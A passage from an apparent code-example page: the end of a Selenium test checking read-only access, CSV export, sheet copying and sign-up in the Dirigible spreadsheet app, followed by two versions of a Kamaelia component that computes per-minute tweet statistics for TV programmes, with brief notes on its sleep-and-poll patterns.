        self.assertEquals(
            self.selenium.get_attribute(self.get_formula_bar_locator() + '@readonly'),
            'true'
        )

        # * She tries to edit some usercode, but can't
        original_code = self.get_usercode()
        self.selenium.get_eval('window.editor.focus()')
        self.human_key_press(key_codes.LETTER_A)
        time.sleep(1)
        self.wait_for_usercode_editor_content(original_code)

        # * She tries to edit the sheet name, but can't

        # * mouses over the sheet name and notes that the appearance
        #   does not change to indicate that it's editable
        self.selenium.mouse_over('id=id_sheet_name')
        time.sleep(1)
        self.wait_for(
            lambda: self.get_css_property('#id_sheet_name', 'background-color') == 'transparent',
            lambda: 'ensure sheet name background stays normal')

        # * He clicks on the sheet name, the sheetname edit textarea does
        #   not appear,
        self.selenium.click('id=id_sheet_name')
        time.sleep(1)
        self.wait_for(
            lambda: not self.is_element_present('id=edit-id_sheet_name'),
            lambda: 'ensure editable sheetname does not appear')

        def download_as_csv():
            self.selenium.click('id=id_export_button')
            self.wait_for_element_visibility('id=id_export_dialog', True)
            download_url = self.selenium.get_attribute('[email protected]')
            download_url = urljoin(self.browser.current_url, download_url)

            stream = self.get_url_with_session_cookie(download_url)
            self.assertEquals(stream.info().gettype(), "text/csv")
            self.assertEquals(
                    stream.info()['Content-Disposition'],
                    'attachment; filename=spaceshuttle.csv'
            )

            expected_file_name = path.join(
                    path.dirname(__file__),
                    "test_data", "public_sheet_csv_file.csv"
            )
            with open(expected_file_name) as expected_file:
                self.assertEquals(
                    stream.read().replace("\r\n", "\n"),
                    expected_file.read().replace("\r\n", "\n")
                )

        # * She confirms that she can download a csv of the sheet
        download_as_csv()

        # * She uses some l33t haxx0ring skillz to try and send a
        #   setcellformula Ajax call directly
        # It doesn't work.
        with self.assertRaises(HTTPError):
            response = self.get_url_with_session_cookie(
                    urljoin(harolds_url, '/set_cell_formula/'),
                    data={'column':3, 'row': 4, 'formula': '=jeffk'}
            )

        # * "Aha!" she says, as she notices a link allowing her to copy the sheet,
        self.wait_for_element_visibility('id_copy_sheet_link', True)
        # which she then clicks
        self.selenium.click('id=id_copy_sheet_link')

        # She is taken to a sheet of her own
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)
        self.wait_for_grid_to_appear()

        # It looks a lot like Harold's but has a different url
        harriets_url = self.browser.current_url
        self.assertFalse(harriets_url == harolds_url)
        self.wait_for_cell_value(2, 4, '25')

        # And she is able to change cell formulae
        self.enter_cell_text(2, 3, '123')
        self.wait_for_cell_value(2, 4, '125')

        # And she is able to change usercode
        self.append_usercode('worksheet[2, 4].value += 100')
        self.wait_for_cell_value(2, 4, '225')

        # And she is well pleased. So much so that she emails two
        # friends about these two sheets (and they tell two
        # friends, and they tell two friends, and so on, and so
        # on.  $$$$)
        self.logout()

        # * Helga is a Dirigible user, but she isn't logged in.
        #   She goes to Harold's page, and sees that it is good.
        self.go_to_url(harolds_url)
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

        # She clicks on the big copy button, and is taken to the
        # login form
        self.selenium.click('id=id_copy_sheet_link')
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)
        self.wait_for_element_visibility('id_login_form_wrap', True)

        # She logs in, and is taken straight to her new copy of
        # Harold's sheet
        self.login(
                self.get_my_usernames()[2],
                already_on_login_page=True
        )
        self.wait_for_grid_to_appear()

        helgas_url = self.browser.current_url
        self.assertFalse(helgas_url == harolds_url)
        self.assertFalse(helgas_url == harriets_url)
        self.wait_for_cell_value(2, 4, '25')

        # Helga makes some edits, which she considers superior to
        # Harriet's
        self.enter_cell_text(2, 3, '1000')
        self.append_usercode('worksheet[2, 4].value += 1000')
        self.wait_for_cell_value(2, 4, '2002')

        # Helga now decides to go and see Harriet's sheet, to
        # laugh at the inferiority of Harriet's fork
        # Her access is denied.
        self.assert_HTTP_error(harriets_url, 403)

        # * Harriet's other friend, Hugh, is not a Dirigible user.... yet.
        # He goes to Harold's sheet and sees that it is good
        self.logout()
        self.go_to_url(harolds_url)
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

        # So good that he clicks the copy button too, despite never
        # having heard of this Dirigible thingy
        self.selenium.click('id=id_copy_sheet_link')
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)

        # He is taken to the login form,
        self.wait_for_element_visibility('id_login_form_wrap', True)

        # on which he spots a nice friendly link inviting him to register.
        # It says 'free' and everyfink.
        self.wait_for_element_to_appear('id=id_login_signup_link')
        self.wait_for_element_to_appear('id=id_login_signup_blurb')
        self.assertTrue("free" in self.get_text('id=id_login_signup_blurb'))

        # Hugh goes through the whole registration rigmarole,
        self.selenium.click('id=id_login_signup_link')
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)
        username = self.get_my_username() + "_x"
        self.email_address = 'harold.testuser-%[email protected]' % (username,)
        password = "p4ssw0rd"
        self.selenium.type('id=id_username', username)
        self.selenium.type('id=id_email', self.email_address)
        self.selenium.type('id=id_password1', password)
        self.selenium.type('id=id_password2', password)
        self.click_link('id_signup_button')

        email_from, email_to, subject, message = self.pop_email_for_client(self.email_address)
        self.assertEquals(subject, 'Dirigible Beta Sign-up')
        confirm_url_re = re.compile(
            r'<(http://projectdirigible\.com/signup/activate/[^>]+)>'
        )
        match = confirm_url_re.search(message)
        self.assertTrue(match)
        confirmation_url = match.group(1).replace('projectdirigible.com', SERVER_IP)

        # * Hugh then logs in
        self.go_to_url(confirmation_url)
        self.login(username, password, already_on_login_page=True)

        # and has his socks knocked off by the presence of the copy of Harold's
        # sheet in his dashboard
        self.selenium.click('link=spaceshuttle')

        # and it has the copied content
        self.selenium.wait_for_page_to_load(PAGE_LOAD_TIMEOUT)
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')

        # Harold logs in and sees that his original sheet is unharmed by all of
        # the other users editing theirs
        self.login(self.get_my_usernames()[0])
        self.go_to_url(harolds_url)
        self.wait_for_grid_to_appear()
        self.wait_for_cell_value(2, 4, '25')
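
Several steps in this example click or type into a read-only sheet, time.sleep(1), and then assert that nothing changed. Waiting for an absence cannot be event-driven, so a short fixed pause before the negative check is the usual compromise. A self-contained illustration of that pattern is below; the read_state and action callables are invented for the example and do not come from the test:

import time


def assert_no_change(read_state, action, settle_seconds=1.0):
    """Perform `action`, give the UI a fixed moment to react, then verify
    that `read_state` still returns the value it had before the action.
    """
    before = read_state()
    action()
    time.sleep(settle_seconds)  # fixed settle time; "nothing happened" has no event
    after = read_state()
    assert after == before, "state changed unexpectedly: %r -> %r" % (before, after)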

Example 13

Project: kamaelia_
Source File: LiveAnalysis.py
View license
    def main(self):
        # Calculate running total and mean etc
            self.dbConnect()
            while not self.finished():
                # The below does LIVE and FINAL analysis - do NOT run DataAnalyser at the same time

                Print("Analysis component: Checking for new data...")

                # Stage 1: Live analysis - could do with a better way to do the first query (indexed field 'analysed' to speed up for now)
                # Could move this into the main app to take a copy of tweets on arrival, but would rather solve separately if poss
                self.db_select("""SELECT tid,pid,timestamp,text,tweet_id,programme_position FROM rawdata WHERE analysed = 0 ORDER BY tid LIMIT 5000""")
                data = self.db_fetchall()

                # Cycle through all the as yet unanalysed tweets
                for result in data:
                    tid = result[0]
                    pid = result[1]
                    tweettime = result[2] # Timestamp based on the tweet's created_at field
                    tweettext = result[3]
                    tweetid = result[4] # This is the real tweet ID, tid just makes a unique identifier as each tweet can be stored against several pids
                    progpos = result[5] # Position through the programme that the tweet was made
                    dbtime = datetime.utcfromtimestamp(tweettime)
                    # Each tweet will be grouped into chunks of one minute to make display better, so set the seconds to zero
                    # This particular time is only used for console display now as a more accurate one calculated from programme position is found later
                    dbtime = dbtime.replace(second=0)
                    Print("Analysis component: Analysing new tweet for pid", pid, "(" , dbtime ,"):")
                    try:
                        Print("Analysis component: '" , tweettext , "'")
                    except UnicodeEncodeError:
                        e = sys.exc_info()[1]
                        Print ("UnicodeEncodeError", e)
                    self.db_select("""SELECT duration FROM programmes_unique WHERE pid = %s""",(pid))
                    progdata = self.db_fetchone()
                    duration = progdata[0]
                    self.db_select("""SELECT totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timediff,timestamp,utcoffset FROM programmes WHERE pid = %s ORDER BY timestamp DESC""",(pid))
                    progdata2 = self.db_fetchone()
                    totaltweets = progdata2[0]
                    # Increment the total tweets recorded for this programme's broadcast
                    totaltweets += 1
                    meantweets = progdata2[1]
                    mediantweets = progdata2[2]
                    modetweets = progdata2[3]
                    stdevtweets = progdata2[4]
                    timediff = progdata2[5]
                    timestamp = progdata2[6]
                    utcoffset = progdata2[7]

                    # Need to work out the timestamp to assign to the entry in analysed data
                    progstart = timestamp - timediff
                    progmins = int(progpos / 60)
                    analysedstamp = int(progstart + (progmins * 60))
                    # Ensure that this tweet occurs within the length of the programme, otherwise for the purposes of this program it's useless

                    if progpos > 0 and progpos <= duration:
                        self.db_select("""SELECT did,totaltweets,wordfreqexpected,wordfrequnexpected FROM analyseddata WHERE pid = %s AND timestamp = %s""",(pid,analysedstamp))
                        analyseddata = self.db_fetchone()
                        # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                        #failcounter = 0
                        # Pass this tweet to the NLTK analysis component
                        self.send([pid,tweetid],"nltk")
#                        print "BUM", 1
                        while not self.dataReady("nltk"):
                        #    if failcounter >= 3000:
                        #        nltkdata = list()
                        #        break
                            time.sleep(0.01)
                        #    failcounter += 1
                        #if failcounter < 3000:
#                        print "BUM", 2
                        if 1:
                            # Receive back a list of words and their frequency for this tweet, including whether or not they are common, an entity etc
                            nltkdata = self.recv("nltk")
                        if analyseddata == None: # No tweets yet recorded for this minute
                            minutetweets = 1
                            self.db_insert("""INSERT INTO analyseddata (pid,totaltweets,timestamp) VALUES (%s,%s,%s)""", (pid,minutetweets,analysedstamp))
                            for word in nltkdata:
                                # Check if we're storing a word or phrase here
                                if nltkdata[word][0] == 1:
                                    self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                        else:
                            did = analyseddata[0]
                            minutetweets = analyseddata[1] # Get current number of tweets for this minute
                            minutetweets += 1 # Add one to it for this tweet

                            self.db_update("""UPDATE analyseddata SET totaltweets = %s WHERE did = %s""",(minutetweets,did))

                            for word in nltkdata:
                                # Check if we're storing a word or phrase
                                if nltkdata[word][0] == 1:
                                    self.db_select("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND phrase LIKE %s""",(pid,analysedstamp,word))
                                    # Check if this phrase has already been stored for this minute - if so, increment the count
                                    wordcheck = self.db_fetchone()
                                    if wordcheck == None:
                                        self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                    else:
                                        self.db_update("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                                else:
                                    self.db_select("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND word LIKE %s""",(pid,analysedstamp,word))
                                    # Check if this word has already been stored for this minute - if so, increment the count
                                    wordcheck = self.db_fetchone()
                                    if wordcheck == None:
                                        self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                    else:
                                        self.db_update("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                        # Averages / stdev are calculated roughly based on the programme's running time at this point
                        progdate = datetime.utcfromtimestamp(timestamp) + timedelta(seconds=utcoffset)
                        actualstart = progdate - timedelta(seconds=timediff)
                        actualtweettime = datetime.utcfromtimestamp(tweettime + utcoffset)

                        # Calculate how far through the programme this tweet occurred
                        runningtime = actualtweettime - actualstart
                        runningtime = runningtime.seconds

                        if runningtime < 0:
                            runningtime = 0
                        else:
                            runningtime = float(runningtime) / 60

                        try:
                            meantweets = totaltweets / runningtime
                        except ZeroDivisionError:
                            meantweets = 0

                        self.db_select("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,progstart,analysedstamp+duration))
                        analyseddata = self.db_fetchall()

                        runningtime = int(runningtime)

                        tweetlist = list()
                        for result in analyseddata:
                            totaltweetsmin = result[0]
                            # Create a list of each minute and the total tweets for that minute in the programme
                            tweetlist.append(int(totaltweetsmin))

                        # Ensure tweetlist has enough entries
                        # If a minute has no tweets, it won't have a database record, so this has to be added
                        if len(tweetlist) < runningtime:
                            additions = runningtime - len(tweetlist)
                            while additions > 0:
                                tweetlist.append(0)
                                additions -= 1

                        # Order by programme position 0,1,2, mins etc
                        tweetlist.sort()

                        mediantweets = tweetlist[int(len(tweetlist)/2)]

                        modes = dict()
                        stdevlist = list()
                        for tweet in tweetlist:
                            modes[tweet] = tweetlist.count(tweet)
                            stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                        modeitems = [[v, k] for k, v in modes.items()]
                        modeitems.sort(reverse=True)
                        modetweets = int(modeitems[0][1])

                        stdevtweets = 0
                        for val in stdevlist:
                            stdevtweets += val

                        try:
                            stdevtweets = math.sqrt(stdevtweets / runningtime)
                        except ZeroDivisionError:
                            stdevtweets = 0

                        # Finished analysis - update DB
                        self.db_update("""UPDATE programmes SET totaltweets = %s, meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s WHERE pid = %s AND timestamp = %s""",(totaltweets,meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))

                    else:
                        pass
                        # Print("Analysis component: Skipping tweet - falls outside the programme's running time")

                    # Mark the tweet as analysed
                    self.db_update("""UPDATE rawdata SET analysed = 1 WHERE tid = %s""",(tid))
                    Print("Analysis component: Done!")

                # Stage 2: If all raw tweets analysed and imported = 1 (all data for this programme stored and programme finished), finalise the analysis - could do bookmark identification here too?
                self.db_select("""SELECT pid,totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timestamp,timediff FROM programmes WHERE imported = 1 AND analysed = 0 LIMIT 5000""")
                data = self.db_fetchall()
                # Cycle through each programme that's ready for final analysis
                for result in data:
                    pid = result[0]
                    self.db_select("""SELECT duration,title FROM programmes_unique WHERE pid = %s""",(pid))
                    data2 = self.db_fetchone()
                    if not data2:
                        Print("Getting data for duration,title, etc failed - pid", pid)
                        Print("Let's try skipping this pid")
                        continue
                    duration = data2[0]
                    totaltweets = result[1]
                    meantweets = result[2]
                    mediantweets = result[3]
                    modetweets = result[4]
                    stdevtweets = result[5]
                    title = data2[1]
                    timestamp = result[6]
                    timediff = result[7]
                    # Cycle through checking if all tweets for this programme have been analysed - if so finalise the stats
                    self.db_select("""SELECT tid FROM rawdata WHERE analysed = 0 AND pid = %s""", (pid))
                    if self.db_fetchone() == None:
                        # OK to finalise stats here
                        Print("Analysis component: Finalising stats for pid:", pid, "(" , title , ")")
                        meantweets = float(totaltweets) / (duration / 60) # Mean tweets per minute
                        self.db_select("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,timestamp-timediff,timestamp+duration-timediff))
                        analyseddata = self.db_fetchall()

                        runningtime = duration / 60

                        tweetlist = list()
                        for result in analyseddata:
                            totaltweetsmin = result[0]
                            tweetlist.append(int(totaltweetsmin))

                        # Ensure tweetlist has enough entries - as above, if no tweets are recorded for a minute it won't be present in the DB
                        if len(tweetlist) < runningtime:
                            additions = runningtime - len(tweetlist)
                            while additions > 0:
                                tweetlist.append(0)
                                additions -= 1

                        tweetlist.sort()

                        mediantweets = tweetlist[int(len(tweetlist)/2)]

                        modes = dict()
                        stdevlist = list()
                        for tweet in tweetlist:
                            modes[tweet] = tweetlist.count(tweet)
                            stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                        modeitems = [[v, k] for k, v in modes.items()]
                        modeitems.sort(reverse=True)
                        modetweets = int(modeitems[0][1])

                        stdevtweets = 0
                        for val in stdevlist:
                            stdevtweets += val
                        try:
                            stdevtweets = math.sqrt(stdevtweets / runningtime)
                        except ZeroDivisionError:
                            stdevtweets = 0

                        if 1: # This data is purely a readout to the terminal at the moment associated with word and phrase frequency, and retweets
                            sqltimestamp1 = timestamp - timediff
                            sqltimestamp2 = timestamp + duration - timediff
                            self.db_select("""SELECT tweet_id FROM rawdata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""", (pid,sqltimestamp1,sqltimestamp2))
                            rawtweetids = self.db_fetchall()
                            tweetids = list()
                            for tweet in rawtweetids:
                                tweetids.append(tweet[0])

                            if len(tweetids) > 0:
                                # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 10 secs)
                                failcounter = 0
                                self.send([pid,tweetids],"nltkfinal")
                                while not self.dataReady("nltkfinal"):
                                    if failcounter >= 1000:
                                        Print("Timed out waiting for NTLKFINAL")
                                        nltkdata = list()
                                        break
                                    time.sleep(0.01)

                                    failcounter += 1
                                    if failcounter %100 == 0:
                                        Print( "Hanging waiting for NLTKFINAL" )

                                Print("failcounter (<1000 is success)", failcounter)
                                if failcounter < 1000:
#                                if 1:
                                    nltkdata = self.recv("nltkfinal")

                        self.db_update("""UPDATE programmes SET meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s, analysed = 1 WHERE pid = %s AND timestamp = %s""",(meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))
                        Print("Analysis component: Done!")

                # Sleep here until more data is available to analyse
                Print("Analysis component: Sleeping for 10 seconds...")
                time.sleep(10)
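
The finalisation stage in this example busy-waits on dataReady("nltkfinal") with time.sleep(0.01), capping the wait at 1000 iterations (roughly ten seconds) and printing a progress note every hundred tries, then sleeps ten seconds before the next polling pass. A standalone sketch of that bounded busy-wait, with a placeholder readiness callable instead of the Kamaelia inbox check, could look like this:

import time


def wait_for_data(is_ready, max_attempts=1000, interval=0.01, note_every=100):
    """Spin on `is_ready()` with short sleeps, giving up after max_attempts.

    Returns True if data became available and False on timeout, matching the
    failcounter logic used for the "nltkfinal" replies above.
    """
    attempts = 0
    while not is_ready():
        if attempts >= max_attempts:
            return False
        time.sleep(interval)
        attempts += 1
        if attempts % note_every == 0:
            print("still waiting (%d attempts)" % attempts)
    return True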

Example 14

Project: kamaelia_
Source File: LiveAnalysis.py
View license
    def main(self):
        # Calculate running total and mean etc

        cursor = self.dbConnect(self.dbuser,self.dbpass)
        while not self.finished():
            # The below does LIVE and FINAL analysis - do NOT run DataAnalyser at the same time

            print "Analysis component: Checking for new data..."

            # Stage 1: Live analysis - could do with a better way to do the first query (indexed field 'analysed' to speed up for now)
            # Could move this into the main app to take a copy of tweets on arrival, but would rather solve separately if poss
            cursor.execute("""SELECT tid,pid,timestamp,text,tweet_id,programme_position FROM rawdata WHERE analysed = 0 ORDER BY tid LIMIT 5000""")
            data = cursor.fetchall()

            # Cycle through all the as yet unanalysed tweets
            for result in data:
                tid = result[0]
                pid = result[1]
                tweettime = result[2] # Timestamp based on the tweet's created_at field
                tweettext = result[3]
                tweetid = result[4] # This is the real tweet ID, tid just makes a unique identifier as each tweet can be stored against several pids
                progpos = result[5] # Position through the programme that the tweet was made
                dbtime = datetime.utcfromtimestamp(tweettime)
                # Each tweet will be grouped into chunks of one minute to make display better, so set the seconds to zero
                # This particular time is only used for console display now as a more accurate one calculated from programme position is found later
                dbtime = dbtime.replace(second=0)
                print "Analysis component: Analysing new tweet for pid", pid, "(" + str(dbtime) + "):"
                print "Analysis component: '" + tweettext + "'"
                cursor.execute("""SELECT duration FROM programmes_unique WHERE pid = %s""",(pid))
                progdata = cursor.fetchone()
                duration = progdata[0]
                cursor.execute("""SELECT totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timediff,timestamp,utcoffset FROM programmes WHERE pid = %s ORDER BY timestamp DESC""",(pid))
                progdata2 = cursor.fetchone()
                totaltweets = progdata2[0]
                # Increment the total tweets recorded for this programme's broadcast
                totaltweets += 1
                meantweets = progdata2[1]
                mediantweets = progdata2[2]
                modetweets = progdata2[3]
                stdevtweets = progdata2[4]
                timediff = progdata2[5]
                timestamp = progdata2[6]
                utcoffset = progdata2[7]

                # Need to work out the timestamp to assign to the entry in analysed data
                progstart = timestamp - timediff
                progmins = int(progpos / 60)
                analysedstamp = int(progstart + (progmins * 60))
                # Ensure that this tweet occurs within the length of the programme, otherwise for the purposes of this program it's useless
                if progpos > 0 and progpos <= duration:
                    cursor.execute("""SELECT did,totaltweets,wordfreqexpected,wordfrequnexpected FROM analyseddata WHERE pid = %s AND timestamp = %s""",(pid,analysedstamp))
                    analyseddata = cursor.fetchone()
                    # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                    failcounter = 0
                    # Pass this tweet to the NLTK analysis component
                    self.send([pid,tweetid],"nltk")
                    while not self.dataReady("nltk"):
                    #    if failcounter >= 3000:
                    #        nltkdata = list()
                    #        break
                        time.sleep(0.01)
                    #    failcounter += 1
                    #if failcounter < 3000:
                        # Receive back a list of words and their frequency for this tweet, including whether or not they are common, an entity etc
                    if 1:
                        nltkdata = self.recv("nltk")
                    if analyseddata == None: # No tweets yet recorded for this minute
                        minutetweets = 1
                        cursor.execute("""INSERT INTO analyseddata (pid,totaltweets,timestamp) VALUES (%s,%s,%s)""", (pid,minutetweets,analysedstamp))
                        for word in nltkdata:
                            # Check if we're storing a word or phrase here
                            if nltkdata[word][0] == 1:
                                cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                            else:
                                cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                    else:
                        did = analyseddata[0]
                        minutetweets = analyseddata[1] # Get current number of tweets for this minute
                        minutetweets += 1 # Add one to it for this tweet

                        cursor.execute("""UPDATE analyseddata SET totaltweets = %s WHERE did = %s""",(minutetweets,did))

                        for word in nltkdata:
                            # Check if we're storing a word or phrase
                            if nltkdata[word][0] == 1:
                                cursor.execute("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND phrase LIKE %s""",(pid,analysedstamp,word))
                                # Check if this phrase has already been stored for this minute - if so, increment the count
                                wordcheck = cursor.fetchone()
                                if wordcheck == None:
                                    cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    cursor.execute("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                            else:
                                cursor.execute("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND word LIKE %s""",(pid,analysedstamp,word))
                                # Check if this word has already been stored for this minute - if so, increment the count
                                wordcheck = cursor.fetchone()
                                if wordcheck == None:
                                    cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    cursor.execute("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                    # Averages / stdev are calculated roughly based on the programme's running time at this point
                    progdate = datetime.utcfromtimestamp(timestamp) + timedelta(seconds=utcoffset)
                    actualstart = progdate - timedelta(seconds=timediff)
                    actualtweettime = datetime.utcfromtimestamp(tweettime + utcoffset)

                    # Calculate how far through the programme this tweet occurred
                    runningtime = actualtweettime - actualstart
                    runningtime = runningtime.seconds

                    if runningtime < 0:
                        runningtime = 0
                    else:
                        runningtime = float(runningtime) / 60

                    try:
                        meantweets = totaltweets / runningtime
                    except ZeroDivisionError, e:
                        meantweets = 0

                    cursor.execute("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,progstart,analysedstamp+duration))
                    analyseddata = cursor.fetchall()

                    runningtime = int(runningtime)

                    tweetlist = list()
                    for result in analyseddata:
                        totaltweetsmin = result[0]
                        # Create a list of each minute and the total tweets for that minute in the programme
                        tweetlist.append(int(totaltweetsmin))

                    # Ensure tweetlist has enough entries
                    # If a minute has no tweets, it won't have a database record, so this has to be added
                    if len(tweetlist) < runningtime:
                        additions = runningtime - len(tweetlist)
                        while additions > 0:
                            tweetlist.append(0)
                            additions -= 1

                    # Order by programme position 0,1,2, mins etc
                    tweetlist.sort()

                    mediantweets = tweetlist[int(len(tweetlist)/2)]

                    modes = dict()
                    stdevlist = list()
                    for tweet in tweetlist:
                        modes[tweet] = tweetlist.count(tweet)
                        stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                    modeitems = [[v, k] for k, v in modes.items()]
                    modeitems.sort(reverse=True)
                    modetweets = int(modeitems[0][1])

                    stdevtweets = 0
                    for val in stdevlist:
                        stdevtweets += val

                    try:
                        stdevtweets = math.sqrt(stdevtweets / runningtime)
                    except ZeroDivisionError, e:
                        stdevtweets = 0

                    # Finished analysis - update DB
                    cursor.execute("""UPDATE programmes SET totaltweets = %s, meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s WHERE pid = %s AND timestamp = %s""",(totaltweets,meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))

                else:
                    print "Analysis component: Skipping tweet - falls outside the programme's running time"

                # Mark the tweet as analysed
                cursor.execute("""UPDATE rawdata SET analysed = 1 WHERE tid = %s""",(tid))
                print "Analysis component: Done!"

            # Stage 2: If all raw tweets analysed and imported = 1 (all data for this programme stored and programme finished), finalise the analysis - could do bookmark identification here too?
            cursor.execute("""SELECT pid,totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timestamp,timediff FROM programmes WHERE imported = 1 AND analysed = 0 LIMIT 5000""")
            data = cursor.fetchall()
            # Cycle through each programme that's ready for final analysis
            for result in data:
                pid = result[0]
                cursor.execute("""SELECT duration,title FROM programmes_unique WHERE pid = %s""",(pid))
                data2 = cursor.fetchone()
                duration = data2[0]
                totaltweets = result[1]
                meantweets = result[2]
                mediantweets = result[3]
                modetweets = result[4]
                stdevtweets = result[5]
                title = data2[1]
                timestamp = result[6]
                timediff = result[7]
                # Cycle through checking if all tweets for this programme have been analysed - if so finalise the stats
                cursor.execute("""SELECT tid FROM rawdata WHERE analysed = 0 AND pid = %s""", (pid))
                if cursor.fetchone() == None:
                    # OK to finalise stats here
                    print "Analysis component: Finalising stats for pid:", pid, "(" + title + ")"

                    meantweets = float(totaltweets) / (duration / 60) # Mean tweets per minute

                    cursor.execute("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,timestamp-timediff,timestamp+duration-timediff))
                    analyseddata = cursor.fetchall()

                    runningtime = duration / 60

                    tweetlist = list()
                    for result in analyseddata:
                        totaltweetsmin = result[0]
                        tweetlist.append(int(totaltweetsmin))

                    # Ensure tweetlist has enough entries - as above, if no tweets are recorded for a minute it won't be present in the DB
                    if len(tweetlist) < runningtime:
                        additions = runningtime - len(tweetlist)
                        while additions > 0:
                            tweetlist.append(0)
                            additions -= 1

                    tweetlist.sort()

                    mediantweets = tweetlist[int(len(tweetlist)/2)]

                    modes = dict()
                    stdevlist = list()
                    for tweet in tweetlist:
                        modes[tweet] = tweetlist.count(tweet)
                        stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                    modeitems = [[v, k] for k, v in modes.items()]
                    modeitems.sort(reverse=True)
                    modetweets = int(modeitems[0][1])

                    stdevtweets = 0
                    for val in stdevlist:
                        stdevtweets += val
                    try:
                        stdevtweets = math.sqrt(stdevtweets / runningtime)
                    except ZeroDivisionError, e:
                        stdevtweets = 0

                    if 1: # At the moment this data is purely a terminal readout, covering word and phrase frequency and retweets
                        sqltimestamp1 = timestamp - timediff
                        sqltimestamp2 = timestamp + duration - timediff
                        cursor.execute("""SELECT tweet_id FROM rawdata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""", (pid,sqltimestamp1,sqltimestamp2))
                        rawtweetids = cursor.fetchall()
                        tweetids = list()
                        for tweet in rawtweetids:
                            tweetids.append(tweet[0])

                        if len(tweetids) > 0:
                            # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                            failcounter = 0
                            self.send([pid,tweetids],"nltkfinal")
                            while not self.dataReady("nltkfinal"):
                            #    if failcounter >= 3000:
                            #        nltkdata = list()
                            #        break
                                time.sleep(0.01)
                            #    failcounter += 1
                            #if failcounter < 3000:
                            if 1:
                                nltkdata = self.recv("nltkfinal")

